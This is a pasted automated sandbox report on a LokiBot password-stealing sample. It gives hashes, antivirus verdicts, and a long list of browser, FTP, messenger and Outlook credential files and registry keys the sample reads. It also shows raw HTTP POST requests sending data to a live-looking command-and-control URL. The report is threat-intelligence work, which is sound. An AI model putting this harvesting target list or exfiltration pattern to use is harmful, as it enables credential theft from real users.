paladin316

Exes_42ad0218f72035e51a309572b22dadcd_exe_2019-08-05_16_30.txt

Aug 5th, 2019
2,040
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.60 KB | None | 0 0
  1.  
  2. * MalFamily: "LokiBot"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Exes_42ad0218f72035e51a309572b22dadcd.exe"
  7. * File Size: 106496
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "28e96ffb0dcdd286ca64b931e914dd5ad6fa4e575f38497db1d96166c7805473"
  10. * MD5: "42ad0218f72035e51a309572b22dadcd"
  11. * SHA1: "bf701f9559c77bcd7cfd52152e9adb1d3499fda3"
  12. * SHA512: "bf1cd74ca669d895261f1ac05134dcbd791f94f0774509cd8e20fe9842a511e9691d3735897fea72c41a17ed02e5327d236cae05d9915055ad77da70c96b32aa"
  13. * CRC32: "068AEBDA"
  14. * SSDEEP: "1536:czvQSZpGS4/31A6mQgL2eYCGDwRcMkVQd8YhY0/EqfIzmd:nSHIG6mQwGmfOQd8YhY0/EqUG"
  15.  
  16. * Process Execution:
  17. "Exes_42ad0218f72035e51a309572b22dadcd.exe",
  18. "services.exe"
  19.  
  20.  
  21. * Executed Commands:
  22. "C:\\Windows\\system32\\lsass.exe"
  23.  
  24.  
  25. * Signatures Detected:
  26.  
  27. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  28. "Details":
  29.  
  30. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  31.  
  32.  
  33. "http_version_old": "HTTP traffic uses version 1.0"
  34.  
  35.  
  36. "suspicious_request": "http://aimsande.com/loki/Panel/five/fre.php"
  37.  
  38.  
  39.  
  40.  
  41. "Description": "Performs some HTTP requests",
  42. "Details":
  43.  
  44. "url": "http://aimsande.com/loki/Panel/five/fre.php"
  45.  
  46.  
  47.  
  48.  
  49. "Description": "Deletes its original binary from disk",
  50. "Details":
  51.  
  52.  
  53. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  54. "Details":
  55.  
  56. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 17348587 times"
  57.  
  58.  
  59.  
  60.  
  61. "Description": "Steals private information from local Internet browsers",
  62. "Details":
  63.  
  64. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  65.  
  66.  
  67.  
  68.  
  69. "Description": "Spoofs its process name and/or associated pathname to appear as a legitimate process",
  70. "Details":
  71.  
  72. "modified_name": "exes_42ad0218f72035e51a309572b22dadcd.exe",
  73. "modified_path": "C:\\Users\\user\\AppData\\Local\\Temp\\exes_42ad0218f72035e51a309572b22dadcd.exe",
  74. "original_name": "Exes_42ad0218f72035e51a309572b22dadcd.exe",
  75. "original_path": "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_42ad0218f72035e51a309572b22dadcd.exe"
  76.  
  77.  
  78.  
  79.  
  80. "Description": "Creates a hidden or system file",
  81. "Details":
  82.  
  83. "file": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
  84.  
  85.  
  86. "file": "C:\\Users\\user\\AppData\\Roaming\\474604"
  87.  
  88.  
  89.  
  90.  
  91. "Description": "File has been identified by 63 Antiviruses on VirusTotal as malicious",
  92. "Details":
  93.  
  94. "Bkav": "W32.TasumisCAK.Trojan"
  95.  
  96.  
  97. "MicroWorld-eScan": "Trojan.PWS.ZKD"
  98.  
  99.  
  100. "FireEye": "Generic.mg.42ad0218f72035e5"
  101.  
  102.  
  103. "CAT-QuickHeal": "Trojan.Mauvaise.SL1"
  104.  
  105.  
  106. "McAfee": "GenericRXCL-KZ!42AD0218F720"
  107.  
  108.  
  109. "Cylance": "Unsafe"
  110.  
  111.  
  112. "SUPERAntiSpyware": "Trojan.Agent/Gen-PasswordStealer"
  113.  
  114.  
  115. "Alibaba": "PWSteal:Win32/Agentb.19583ba9"
  116.  
  117.  
  118. "K7GW": "Password-Stealer ( 004d88671 )"
  119.  
  120.  
  121. "K7AntiVirus": "Password-Stealer ( 004d88671 )"
  122.  
  123.  
  124. "Arcabit": "Trojan.PWS.ZKD"
  125.  
  126.  
  127. "Invincea": "heuristic"
  128.  
  129.  
  130. "F-Prot": "W32/Trojan2.PBTA"
  131.  
  132.  
  133. "Symantec": "SMG.Heur!gen"
  134.  
  135.  
  136. "APEX": "Malicious"
  137.  
  138.  
  139. "Avast": "Win32:LokiBot-A Trj"
  140.  
  141.  
  142. "ClamAV": "Win.Trojan.naKocTb-6331389-1"
  143.  
  144.  
  145. "Kaspersky": "Trojan.Win32.Agentb.bvrg"
  146.  
  147.  
  148. "BitDefender": "Trojan.PWS.ZKD"
  149.  
  150.  
  151. "NANO-Antivirus": "Trojan.Win32.Stealer.eshrhl"
  152.  
  153.  
  154. "Paloalto": "generic.ml"
  155.  
  156.  
  157. "ViRobot": "Trojan.Win32.Agent.106496.HD"
  158.  
  159.  
  160. "Tencent": "Win32.Trojan.Agentb.Pcjd"
  161.  
  162.  
  163. "Endgame": "malicious (high confidence)"
  164.  
  165.  
  166. "Emsisoft": "Trojan-PSW.Fareit (A)"
  167.  
  168.  
  169. "Comodo": "TrojWare.Win32.Fareit.LB@7pzcfo"
  170.  
  171.  
  172. "F-Secure": "Trojan.TR/Crypt.XPACK.Gen"
  173.  
  174.  
  175. "DrWeb": "Trojan.PWS.Stealer.23680"
  176.  
  177.  
  178. "Zillya": "Trojan.naKocTb.Win32.12"
  179.  
  180.  
  181. "TrendMicro": "TSPY_LOKI.SMA"
  182.  
  183.  
  184. "McAfee-GW-Edition": "BehavesLike.Win32.Generic.ch"
  185.  
  186.  
  187. "Trapmine": "malicious.high.ml.score"
  188.  
  189.  
  190. "Sophos": "Troj/Fareit-CHG"
  191.  
  192.  
  193. "SentinelOne": "DFI - Malicious PE"
  194.  
  195.  
  196. "Cyren": "W32/Trojan.LAPN-1109"
  197.  
  198.  
  199. "Jiangmin": "Trojan.naKocTb.l"
  200.  
  201.  
  202. "Avira": "TR/Crypt.XPACK.Gen"
  203.  
  204.  
  205. "Antiy-AVL": "Trojan/Win32.SGeneric"
  206.  
  207.  
  208. "Microsoft": "PWS:Win32/Primarypass.A"
  209.  
  210.  
  211. "AegisLab": "Trojan.Win32.naKocTb.tnB5"
  212.  
  213.  
  214. "ZoneAlarm": "Trojan.Win32.Agentb.bvrg"
  215.  
  216.  
  217. "GData": "Trojan.PWS.ZKD"
  218.  
  219.  
  220. "TACHYON": "Trojan/W32.naKocTb.106496"
  221.  
  222.  
  223. "AhnLab-V3": "Trojan/Win32.naKocTb.R270234"
  224.  
  225.  
  226. "Acronis": "suspicious"
  227.  
  228.  
  229. "VBA32": "BScope.Trojan.Agentb"
  230.  
  231.  
  232. "ALYac": "Trojan.PWS.ZKD"
  233.  
  234.  
  235. "MAX": "malware (ai score=96)"
  236.  
  237.  
  238. "Ad-Aware": "Trojan.PWS.ZKD"
  239.  
  240.  
  241. "Malwarebytes": "Spyware.LokiBot"
  242.  
  243.  
  244. "Zoner": "Trojan.Win32.77501"
  245.  
  246.  
  247. "ESET-NOD32": "Win32/PSW.Fareit.L"
  248.  
  249.  
  250. "TrendMicro-HouseCall": "TSPY_LOKI.SMA"
  251.  
  252.  
  253. "Rising": "Trojan.Fareit!1.B343 (CLASSIC)"
  254.  
  255.  
  256. "Ikarus": "Trojan-Spy.Primarypass"
  257.  
  258.  
  259. "MaxSecure": "Trojan.Malware.300983.susgen"
  260.  
  261.  
  262. "Fortinet": "W32/Generic.AP.BA928!tr"
  263.  
  264.  
  265. "Webroot": "W32.Trojan.Gen"
  266.  
  267.  
  268. "AVG": "Win32:LokiBot-A Trj"
  269.  
  270.  
  271. "Cybereason": "malicious.8f7203"
  272.  
  273.  
  274. "Panda": "Trj/GdSda.A"
  275.  
  276.  
  277. "CrowdStrike": "win/malicious_confidence_90% (W)"
  278.  
  279.  
  280. "Qihoo-360": "Win32/Trojan.15d"
  281.  
  282.  
  283.  
  284.  
  285. "Description": "Clamav Hits in Target/Dropped/SuriExtracted",
  286. "Details":
  287.  
  288. "target": "clamav:Win.Trojan.naKocTb-6331389-1, sha256:28e96ffb0dcdd286ca64b931e914dd5ad6fa4e575f38497db1d96166c7805473, type:PE32 executable (GUI) Intel 80386, for MS Windows"
  289.  
  290.  
  291.  
  292.  
  293. "Description": "Harvests credentials from local FTP client softwares",
  294. "Details":
  295.  
  296. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\sitemanager.xml"
  297.  
  298.  
  299. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
  300.  
  301.  
  302. "file": "C:\\Users\\user\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db"
  303.  
  304.  
  305. "file": "C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml"
  306.  
  307.  
  308. "file": "C:\\Users\\user\\AppData\\Roaming\\FTPGetter\\servers.xml"
  309.  
  310.  
  311. "file": "C:\\Users\\user\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat"
  312.  
  313.  
  314. "key": "HKEY_CURRENT_USER\\Software\\Far\\Plugins\\FTP\\Hosts"
  315.  
  316.  
  317. "key": "HKEY_CURRENT_USER\\Software\\Far2\\Plugins\\FTP\\Hosts"
  318.  
  319.  
  320. "key": "HKEY_CURRENT_USER\\Software\\Ghisler\\Total Commander"
  321.  
  322.  
  323. "key": "HKEY_CURRENT_USER\\Software\\LinasFTP\\Site Manager"
  324.  
  325.  
  326.  
  327.  
  328. "Description": "Harvests information related to installed instant messenger clients",
  329. "Details":
  330.  
  331. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  332.  
  333.  
  334.  
  335.  
  336. "Description": "Harvests information related to installed mail clients",
  337. "Details":
  338.  
  339. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
  340.  
  341.  
  342. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046\\Email"
  343.  
  344.  
  345. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
  346.  
  347.  
  348. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
  349.  
  350.  
  351. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff\\Email"
  352.  
  353.  
  354. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326\\Email"
  355.  
  356.  
  357. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
  358.  
  359.  
  360. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
  361.  
  362.  
  363. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
  364.  
  365.  
  366. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e\\Email"
  367.  
  368.  
  369. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1\\Email"
  370.  
  371.  
  372. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
  373.  
  374.  
  375. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
  376.  
  377.  
  378. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
  379.  
  380.  
  381. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7\\Email"
  382.  
  383.  
  384. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
  385.  
  386.  
  387. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2\\Email"
  388.  
  389.  
  390. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\Email"
  391.  
  392.  
  393. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a\\Email"
  394.  
  395.  
  396. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001\\Email"
  397.  
  398.  
  399. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
  400.  
  401.  
  402. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
  403.  
  404.  
  405. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
  406.  
  407.  
  408. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
  409.  
  410.  
  411. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259\\Email"
  412.  
  413.  
  414. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
  415.  
  416.  
  417. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
  418.  
  419.  
  420. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670\\Email"
  421.  
  422.  
  423. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604\\Email"
  424.  
  425.  
  426. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
  427.  
  428.  
  429. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
  430.  
  431.  
  432. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
  433.  
  434.  
  435. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
  436.  
  437.  
  438. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
  439.  
  440.  
  441. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046\\Email"
  442.  
  443.  
  444.  
  445.  
  446. "Description": "Collects information to fingerprint the system",
  447. "Details":
  448.  
  449.  
  450.  
  451. * Started Service:
  452. "VaultSvc"
  453.  
  454.  
  455. * Mutexes:
  456. "6EFA73A4746045B65DEE781E"
  457.  
  458.  
  459. * Modified Files:
  460. "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
  461. "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
  462.  
  463.  
  464. * Deleted Files:
  465. "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
  466. "C:\\Users\\user\\AppData\\Local\\Temp\\exes_42ad0218f72035e51a309572b22dadcd.exe"
  467.  
  468.  
  469. * Modified Registry Keys:
  470.  
  471. * Deleted Registry Keys:
  472.  
  473. * DNS Communications:
  474.  
  475. "type": "A",
  476. "request": "aimsande.com",
  477. "answers":
  478.  
  479. "data": "45.64.104.39",
  480. "type": "A"
  481.  
  482.  
  483.  
  484.  
  485.  
  486. * Domains:
  487.  
  488. "ip": "45.64.104.39",
  489. "domain": "aimsande.com"
  490.  
  491.  
  492.  
  493. * Network Communication - ICMP:
  494.  
  495. * Network Communication - HTTP:
  496.  
  497. "count": 2,
  498. "body": "",
  499. "uri": "http://aimsande.com/loki/Panel/five/fre.php",
  500. "user-agent": "Mozilla/4.08 (Charon; Inferno)",
  501. "method": "POST",
  502. "host": "aimsande.com",
  503. "version": "1.0",
  504. "path": "/loki/Panel/five/fre.php",
  505. "data": "POST /loki/Panel/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: aimsande.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4D4F90F8\r\nContent-Length: 176\r\nConnection: close\r\n\r\n",
  506. "port": 80
  507.  
  508.  
  509. "count": 1,
  510. "body": "",
  511. "uri": "http://aimsande.com/loki/Panel/five/fre.php",
  512. "user-agent": "Mozilla/4.08 (Charon; Inferno)",
  513. "method": "POST",
  514. "host": "aimsande.com",
  515. "version": "1.0",
  516. "path": "/loki/Panel/five/fre.php",
  517. "data": "POST /loki/Panel/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: aimsande.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4D4F90F8\r\nContent-Length: 149\r\nConnection: close\r\n\r\n",
  518. "port": 80
  519.  
  520.  
  521.  
  522. * Network Communication - SMTP:
  523.  
  524. * Network Communication - Hosts:
  525.  
  526. * Network Communication - IRC:
Add Comment
Please, Sign In to add comment